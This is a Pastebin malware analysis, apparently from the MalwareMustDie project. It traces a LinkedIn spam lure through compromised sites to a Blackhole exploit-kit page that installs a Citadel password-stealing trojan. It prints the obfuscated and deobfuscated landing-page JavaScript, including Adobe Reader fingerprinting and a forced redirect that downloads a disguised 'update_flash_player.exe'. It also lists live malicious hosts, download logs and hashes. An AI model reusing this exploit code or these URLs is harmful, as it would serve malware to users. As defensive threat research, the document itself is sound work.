Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===========================================
- #MalwareMustDie!!!!!!!!!!
- INFECTION OF CITADEL WITH BHEK
- BHEK IS USING PARAMETER e & f
- Exploit Method: AcroPDF.PDF
- Payload download Method: Msxml2.XMLHTTP
- Payload : Citadel/Trojan Password/InfoStealer
- VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
- ===========
- Only VT6/43 !!!!
- ==========
- DrWeb : Trojan.PWS.Stealer.946
- Norman : W32/Krypt.GB
- McAfee-GW-Edition : PWS-Zbot.gen.aln
- McAfee : PWS-Zbot.gen.aln
- Fortinet : W32/Kryptik.WDV!tr
- Panda : Suspicious file
- Summary:
- This trojan send the data of infected PC by crypted communication via
- HTTP to 108.178.59.34 (See network conn report below)
- And also downloading other malwares:
- * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
- * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
- ----------------------------
- Set of infected file:
- ----------------------------
- assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2
- index.html.2 ad967ba32c54c59db0f4a947410d96f2
- js.js d20a786ec45f68eb56f15a589c566b27
- js.js.1 d20a786ec45f68eb56f15a589c566b27
- js.js.2 d20a786ec45f68eb56f15a589c566b27
- LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457
- update_flash_player.exe bb53221e4220466c876dbfad9cede066
- PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
- ===========================================
- FULL ANALYSYS / #MalwareMustDie / @unixfreaxjp
- ===========================================
- //Likedin Spam;
- http://pastebin.com/raw.php?i=n7rppRJY
- #Hint from @Xylit0l < Merci!!!!!!!!
- //infected url detected:
- ...Privately</span></a></div></td></tr></table>
- (LINE 170): <a href="http://www.nikecup.net/MSmxYk/index.html" style="color:#006699;
- font-family:Arial,sans-serif;font-size:12px;text-decoration:none">Chase Mathis</a>
- ---------------------------------------
- //download PoC
- --12:24:18-- http://www.nikecup.net/MSmxYk/index.html
- => `index.html.2'
- Resolving www.nikecup.net... 62.149.131.163
- Connecting to www.nikecup.net|62.149.131.163|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 422 [text/html]
- 12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]
- --------------------------------
- // cat the mess
- <html>
- <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
- <script type="text/javascript" src="http://alpuyecamorelos.com/dycYbDyw/js.js"></script>
- <script type="text/javascript" src="http://videorender.com.ar/kSWEngwv/js.js"></script>
- <script type="text/javascript" src="http://jbrnh.com/3ZKtSw8d/js.js"></script>
- </html>
- ----------------------------------
- // fetch the js.js, noted: referer
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://www.nikecup.net/MSmxYk/index.html"
- --target"http://jbrnh.com/3ZKtSw8d/js.js"
- --12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js
- => `js.js'
- Resolving alpuyecamorelos.com... 209.62.88.194
- Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/javascript]
- 12:30:38 (2.29 MB/s) - `js.js' saved [73/73]
- --12:31:06-- http://videorender.com.ar/kSWEngwv/js.js
- => `js.js.1'
- Resolving videorender.com.ar... 174.37.144.224
- Connecting to videorender.com.ar|174.37.144.224|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/javascript]
- 12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]
- --12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js
- => `js.js.2'
- Resolving jbrnh.com... 184.168.101.248
- Connecting to jbrnh.com|184.168.101.248|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 73 [application/x-javascript]
- 12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]
- // all same contents↑
- -----------------------------
- // cat the mess (js.js)
- document.location='http://108.178.59.34/links/assure_numb_engineers.php';
- ----------------------------
- // fetch the mess, noted: referer, user agent
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://www.nikecup.net/MSmxYk/index.html"
- --target="http://108.178.59.34/links/assure_numb_engineers.php"
- --12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php
- => `assure_numb_engineers.php'
- Connecting to 108.178.59.34:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]
- ----------------------------
- // Voila..plugin Detect...in blurp..
- <html><head><title></title></head><body><div dqa="asd"></div><scri
- 0-9a-z]/g,k);};g="getEleme";p=parseInt;cc="co";ss=String.fromCharC
- nction asd(){e=window["eval"];e(s);}ddd="ad".substr(1);sss="sub"+"
- (i);};g+="ntB"+"yId";</script><u id="google" 45="1b43391a(1b454545
- c%3r3k393p1s)31331e3o3r#3k2r2g3c3r*3k393p1s3c!3r3k393q3f^3l3k1a371
- @2g3l373a3b&3a213q3o3r+3b1t371g39%373i3i253o)3o37411a37#1g2r2g3c3r
- 37411a371g$2r2g3c3r3k(393p1b1t3f@3c1a371g3l&3k283" 37="383i3b3a18_
- p3q373q3r&3p211f1k1t+3o3b3q3r3o%3k12374537)1g3p3q373q#3r3p211j1t*3
- 3c3r3k39$3q3f3l3k1a(381e371b43@3s373o1239&213q3e3f3p+1t3f3c1a39%1g
- f3p2a3r!3k391a381b^44441a391g_3f3p253o3o$37411a381b(181" 40="s*1i1
- 3b433f$3c1a381g3f(3p2a3r3k39@1a391b1b43&391a381b45+45451e3d3b%3q2q
- s141e!141e16163d^3b3q2q3b3o_3p3f3l3k1s$3c3r3k393q(3f3l3k1a37@1b433
- :
- :
- 3o141e142n@393o3f3m3q&3f3k3d1g28+3f393q
- 13216331h%1e39213q3e)3f3p1t3c3l#3o1a371
- 1g3p3i3f@393b1a1k1b&1t3f3c1a3d+1g3i3b3k
- a3b3i3b_3q3b123c31$3733454539(373q393e1
- 21)1a3g1g3d3b#3q293i3b3j*3b3k3q3p26!412
- f&3c1a3d1b43+3f3c1a3d1g%3c3f3o3p3q)273e
- $3l3o3b1b1b(433d1g3f3k@3p3b3o3q26&3b3c3
- >
- if(020==0x10)d=document;
- try{(d+"523")()}catch(dsgdsg){a=d[g](gg
- s="";
- for(i=0;;i++){
- window.asd2();
- if(r){s=s+r;}else break;
- }
- a=s;
- s="";
- k="";
- asd3();
- qa=0x1e;
- for(i=0;i<a.length;i+=2){
- s+=ss(p(a[sss](i,2),qa));
- }
- asd();
- </script></body></html>
- --------------------------------------------------------
- // deobfs the code
- try {
- var PluginDetect = {
- version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
- return function (){
- c(b, a)
- }
- }
- , isDefined : function (b){
- return typeof b != "undefined"
- }
- , isArray : function (b){
- return (/array/i).test(Object.prototype.toString.call(b))
- }
- , isFunc : function (b){
- return typeof b == "function"
- }
- , isString : function (b){
- return typeof b == "string"
- }
- , isNum : function (b){
- return typeof b == "number"
- }
- , isStrNum : function (b){
- return (typeof b == "string" && (/\d/).test(b))
- }
- , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
- getNum : function (b, c){
- var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
- exec(b) : null;
- return a ? a[0] : null
- }
- , compareNums : function (h, f, d){
- var e = this , c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)){
- if (e.isDefined(d) && d.compareNums){
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length);
- a ++ ){
- if (g(c[a], 10) > g(b[a], 10)){
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)){
- return - 1
- }
- }
- }
- return 0
- }
- , formatNum : function (b, c){
- var d = this , a, e;
- if (!d.isStrNum(b)){
- return null
- }
- if (!d.isNum(c)){
- c = 4
- }
- c--;
- e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (a = 0; a < 4; a ++ ){
- if (/^(0+)(.+)$/.test(e[a])){
- e[a] = RegExp.$2
- }
- if (a > c ||! (/\d/).test(e[a])){
- e[a] = "0"
- }
- }
- return e.slice(0, 4).join(",")
- }
- , $$hasMimeType : function (a){
- return function (c){
- if (!a.isIE && c){
- var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
- for (b = 0; b < d.length; b ++ ){
- if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
- f = navigator.mimeTypes[d[b]];
- e = f ? f.enabledPlugin : 0;
- if (e && (e.name || e.description)){
- return f
- }
- }
- }
- }
- return null
- }
- }
- , findNavPlugin : function (l, e, c){
- var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
- new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
- for (f = 0; f < a.length; f ++ ){
- m = a[f].description || g;
- b = a[f].name || g;
- if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
- test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
- if (!k ||! (k.test(m) || k.test(b))){
- return a[f]
- }
- }
- }
- return null
- }
- , getMimeEnabledPlugin : function (k, m, c){
- var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
- l, d, j = e.isString(k) ? [k] : k;
- for (d = 0; d < j.length; d ++ ){
- if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
- l = f.description || h;
- a = f.name || h;
- if (b.test(l) || b.test(a)){
- if (!g ||! (g.test(l) || g.test(a))){
- return f
- }
- }
- }
- }
- return 0
- }
- , getPluginFileVersion : function (f, b){
- var h = this , e, d, g, a, c =- 1;
- if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
- return b
- }
- if (!b){
- return e
- }
- e = h.formatNum(e);
- b = h.formatNum(b);
- d = b.split(h.splitNumRegx);
- g = e.split(h.splitNumRegx);
- for (a = 0; a < d.length; a ++ ){
- if (c >- 1 && a > c && d[a] != "0"){
- return b
- }
- if (g[a] != d[a]){
- if (c ==- 1){
- c = a
- }
- if (d[a] != "0"){
- return b
- }
- }
- }
- return e
- }
- , AXO : window.ActiveXObject, getAXO : function (a){
- var f = null, d, b = this , c = {
- }
- ;
- try {
- f = new b.AXO(a)
- }
- catch (d){
- }
- return f
- }
- , convertFuncs : function (f){
- var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
- for (ain f){
- if (b.test(a)){
- try {
- g = a.slice(2);
- if (g.length > 0 &&! f[g]){
- f[g] = f[a](f);
- deletef[a]
- }
- }
- catch (d){
- }
- }
- }
- }
- , initObj : function (e, b, d){
- var a, c;
- if (e){
- if (e[b[0]] == 1 || d){
- for (a = 0; a < b.length; a = a + 2){
- e[b[a]] = b[a + 1]
- }
- }
- for (ain e){
- c = e[a];
- if (c && c[b[0]] == 1){
- this .initObj(c, b)
- }
- }
- }
- }
- , initScript : function (){
- var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
- b = a.platform || "", h = a.product || "";
- c.initObj(c, ["$", c]);
- for (fin c.Plugins){
- if (c.Plugins[f]){
- c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
- }
- }
- ;
- c.OS = 100;
- if (b){
- var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
- 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
- , 100];
- for (f = d.length - 2; f >= 0; f = f - 2){
- if (d[f] && new RegExp(d[f], "i").test(b)){
- c.OS = d[f + 1];
- break
- }
- }
- }
- c.convertFuncs(c);
- c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
- "body")[0] || document.body || null);
- c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
- c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
- null ;
- c.ActiveXEnabled = false;
- if (c.isIE){
- var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
- "Scripting.Dictionary", "wmplayer.ocx"];
- for (f = 0; f < j.length; f ++ ){
- if (c.getAXO(j[f])){
- c.ActiveXEnabled = true;
- break
- }
- }
- }
- c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
- c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
- "0.9") : null;
- c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
- c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
- /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
- RegExp.$1) : null;
- c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
- c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
- parseFloat(RegExp.$1, 10) : null;
- c.addWinEvent("load", c.handler(c.runWLfuncs, c))
- }
- , init : function (d){
- var c = this , b, d, a = {
- status :- 3, plugin : 0
- }
- ;
- if (!c.isString(d)){
- return a
- }
- if (d.length == 1){
- c.getVersionDelimiter = d;
- return a
- }
- d = d.toLowerCase().replace(/\s/g, "");
- b = c.Plugins[d];
- if (!b ||! b.getVersion){
- return a
- }
- a.plugin = b;
- if (!c.isDefined(b.installed)){
- b.installed = null;
- b.version = null;
- b.version0 = null;
- b.getVersionDone = null;
- b.pluginName = d
- }
- c.garbage = false;
- if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
- a.status =- 2;
- return a
- }
- a.status = 1;
- return a
- }
- , fPush : function (b, a){
- var c = this ;
- if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
- ])))){
- a.push(b)
- }
- }
- , callArray : function (b){
- var c = this , a;
- if (c.isArray(b)){
- for (a = 0; a < b.length; a ++ ){
- if (b[a] === null){
- return
- }
- c.call(b[a]);
- b[a] = null
- }
- }
- }
- , call : function (c){
- var b = this , a = b.isArray(c) ? c.length :- 1;
- if (a > 0 && b.isFunc(c[0])){
- c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
- }
- else {
- if (b.isFunc(c)){
- c(b)
- }
- }
- }
- , getVersionDelimiter : ",", $$getVersion : function (a){
- return function (g, d, c){
- var e = a.init(g), f, b, h = {
- }
- ;
- if (e.status < 0){
- return null
- }
- ;
- f = e.plugin;
- if (f.getVersionDone != 1){
- f.getVersion(null, d, c);
- if (f.getVersionDone === null){
- f.getVersionDone = 1
- }
- }
- a.cleanup();
- b = (f.version || f.version0);
- b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
- return b
- }
- }
- , cleanup : function (){
- }
- , addWinEvent : function (d, c){
- var e = this , a = window, b;
- if (e.isFunc(c)){
- if (a.addEventListener){
- a.addEventListener(d, c, false)
- }
- else {
- if (a.attachEvent){
- a.attachEvent("on" + d, c)
- }
- else {
- b = a["on" + d];
- a["on" + d] = e.winHandler(c, b)
- }
- }
- }
- }
- , winHandler : function (d, c){
- return function (){
- d();
- if (typeof c == "function"){
- c()
- }
- }
- }
- , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
- var b = {
- }
- ;
- a.winLoaded = true;
- a.callArray(a.WLfuncs0);
- a.callArray(a.WLfuncs);
- if (a.onDoneEmptyDiv){
- a.onDoneEmptyDiv()
- }
- }
- , winLoaded : false, $$onWindowLoaded : function (a){
- return function (b){
- if (a.winLoaded){
- a.call(b)
- }
- else {
- a.fPush(b, a.WLfuncs)
- }
- }
- }
- , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
- function (){
- var d = this , b, h, c, a, f, g;
- if (d.div && d.div.childNodes){
- for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
- c = d.div.childNodes[b];
- if (c && c.childNodes){
- for (h = c.childNodes.length - 1; h >= 0; h -- ){
- g = c.childNodes[h];
- try {
- c.removeChild(g)
- }
- catch (f){
- }
- }
- }
- if (c){
- try {
- d.div.removeChild(c)
- }
- catch (f){
- }
- }
- }
- }
- if (!d.div){
- a = document.getElementById(d.divID);
- if (a){
- d.div = a
- }
- }
- if (d.div && d.div.parentNode){
- try {
- d.div.parentNode.removeChild(d.div)
- }
- catch (f){
- }
- d.div = null
- }
- }
- , DONEfuncs : [], onDoneEmptyDiv : function (){
- var c = this , a, b;
- if (!c.winLoaded){
- return
- }
- if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
- return
- }
- for (ain c){
- b = c[a];
- if (b && b.funcs){
- if (b.OTF == 3){
- return
- }
- if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
- return
- }
- }
- }
- for (a = 0; a < c.DONEfuncs.length; a ++ ){
- c.callArray(c.DONEfuncs)
- }
- c.emptyDiv()
- }
- , getWidth : function (c){
- if (c){
- var a = c.scrollWidth || c.offsetWidth, b = this ;
- if (b.isNum(a)){
- return a
- }
- }
- return - 1
- }
- , getTagStatus : function (m, g, a, b){
- var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
- g.span, i = c.getWidth(d);
- if (!k ||! h ||! d ||! c.getDOMobj(m)){
- return - 2
- }
- if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
- return 0
- }
- if (l >= i){
- return - 1
- }
- try {
- if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
- if (!m.winLoaded && c.winLoaded){
- return 1
- }
- if (m.winLoaded && c.isNum(b)){
- if (!c.isNum(m.count)){
- m.count = b
- }
- if (b - m.count >= 10){
- return 1
- }
- }
- }
- }
- catch (f){
- }
- return 0
- }
- , getDOMobj : function (g, a){
- var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
- try {
- if (b && a){
- d.div.focus()
- }
- }
- catch (f){
- }
- return b ? c.firstChild : null
- }
- , setStyle : function (b, g){
- var f = b.style, a, d, c = this ;
- if (f && g){
- for (a = 0; a < g.length; a = a + 2){
- try {
- f[g[a]] = g[a + 1]
- }
- catch (d){
- }
- }
- }
- }
- , insertDivInBody : function (a, i){
- var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
- document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
- if (!g){
- try {
- j.write(c + 'div id="' + b + '">o' + c + "/div>");
- d = j.getElementById(b)
- }
- catch (h){
- }
- }
- g = (j.getElementsByTagName("body")[0] || j.body);
- if (g){
- if (g.firstChild && f.isDefined(g.insertBefore)){
- g.insertBefore(a, g.firstChild)
- }
- else {
- g.appendChild(a)
- }
- if (d){
- g.removeChild(d)
- }
- }
- else {
- }
- }
- , insertHTML : function (g, b, h, a, l){
- var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
- var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
- "0px", "visibility", "visible"];
- var i =
- "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
- if (!k.isDefined(a)){
- a = ""
- }
- if (k.isString(g) && (/[^\s]/).test(g)){
- g = g.toLowerCase().replace(/\s/g, "");
- q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
- q += 'style="' + i + 'display:inline;" ';
- for (o = 0; o < b.length; o = o + 2){
- if (/[^\s]/.test(b[o + 1])){
- q += b[o] + '="' + b[o + 1] + '" '
- }
- }
- q += ">";
- for (o = 0; o < h.length; o = o + 2){
- if (/[^\s]/.test(h[o + 1])){
- q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
- }
- }
- q += a + f + "/" + g + ">"
- }
- else {
- q = a
- }
- if (!k.div){
- j = n.getElementById(k.divID);
- if (j){
- k.div = j
- }
- else {
- k.div = n.createElement("div");
- k.div.id = k.divID
- }
- k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
- 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
- + "px", "verticalAlign", "baseline", "display", "block"]));
- if (!j){
- k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
- k.insertDivInBody(k.div)
- }
- }
- if (k.div && k.div.parentNode){
- k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
- pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
- try {
- p.innerHTML = q
- }
- catch (m){
- }
- ;
- try {
- k.div.appendChild(p)
- }
- catch (m){
- }
- ;
- return {
- span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
- }
- }
- return {
- span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
- }
- }
- , Plugins : {
- adobereader : {
- mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- {
- }
- , pluginHasMimeType : function (d, c, f){
- var b = this , e = b.$, a;
- for (ain d){
- if (d[a] && d[a].type && d[a].type == c){
- return 1
- }
- }
- if (e.getMimeEnabledPlugin(c, f)){
- return 1
- }
- return 0
- }
- , getVersion : function (l, j){
- var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
- if (d.isString(j)){
- j = j.replace(/\s/g, "");
- if (j){
- k = j
- }
- }
- else {
- j = null
- }
- if (d.isDefined(g.INSTALLED[k])){
- g.installed = g.INSTALLED[k];
- return
- }
- if (!d.isIE){
- a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
- if (g.getVersionDone !== 0){
- g.getVersionDone = 0;
- b = d.getMimeEnabledPlugin(g.mimeType, a);
- if (!j){
- n = b
- }
- if (!b && d.hasMimeType(g.mimeType)){
- b = d.findNavPlugin(a, 0)
- }
- if (b){
- g.navPluginObj = b;
- h = d.getNum(b.description) || d.getNum(b.name);
- h = d.getPluginFileVersion(b, h);
- if (!h && d.OS == 1){
- if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
- h = "9"
- }
- else {
- if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
- h = "8"
- }
- }
- }
- }
- }
- else {
- h = g.version
- }
- if (!d.isDefined(n)){
- n = d.getMimeEnabledPlugin(k, a)
- }
- g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
- }
- else {
- b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
- c =/=\ s * ([ \ d \ .] + ) / g;
- try {
- f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
- ""], "", g))).GetVersions();
- for (m = 0; m < 5; m ++ ){
- if (c.test(f) && (!h || RegExp.$1 > h)){
- h = RegExp.$1
- }
- }
- }
- catch (i){
- }
- g.installed = h ? 1 : (b ? 0 :- 1)
- }
- if (!g.version){
- g.version = d.formatNum(h)
- }
- g.INSTALLED[k] = g.installed
- }
- }
- , zz : 0
- }
- }
- ;
- PluginDetect.initScript();
- PluginDetect.getVersion(".");
- pdfver = PluginDetect.getVersion("AdobeReader");
- }
- catch (e){
- }
- if (typeof pdfver == 'string'){
- pdfver = pdfver.split('.')
- }
- else {
- pdfver = [0, 0, 0, 0]
- }
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i) - 46).toString(16);
- if (k.length == 1)k = "0" + k;
- d.push(k);
- }
- ;
- return d.join("");
- }
- end_redirect = function (){
- window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
- }
- ;
- window.onbeforeunload = function (){
- return "";
- }
- ;
- document.write('');
- setTimeout(end_redirect, 60000);
- ------------------------------------
- // infection analysis per exploit & PluginDetect hint..
- ===================
- EXPLOIT-ED BY:
- ===================
- // , Plugins : {
- // adobereader : {
- // mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- // "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- ===================
- DOWNLOADED VIA:
- ===================
- // var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- // "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
- // "Scripting.Dictionary", "wmplayer.ocx"];
- // for (f = 0; f < j.length; f ++ ){
- // if (c.getAXO(j[f])){
- // c.ActiveXEnabled = true;
- // break
- *********** Please be noted parameter = var f, j *****************
- ===================
- TO URL:
- ===================
- // end_redirect = function (){
- // window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
- //
- --------------download PoC------------------------------------------------
- --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
- --referer="http://108.178.59.34/links/assure_numb_engineers.php"
- --target="http://108.178.59.34/adobe/update_flash_player.exe"
- --12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe
- => `update_flash_player.exe'
- Connecting to 108.178.59.34:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 150,616 (147K) [application/octet-stream]
- 12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD
- ---------------INFECTION CROSS REFERENCE AUTOMATION------------------
- [2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
- [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
- [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
- [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
- [2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- [2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
- [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
- [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
- -----------------------------
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
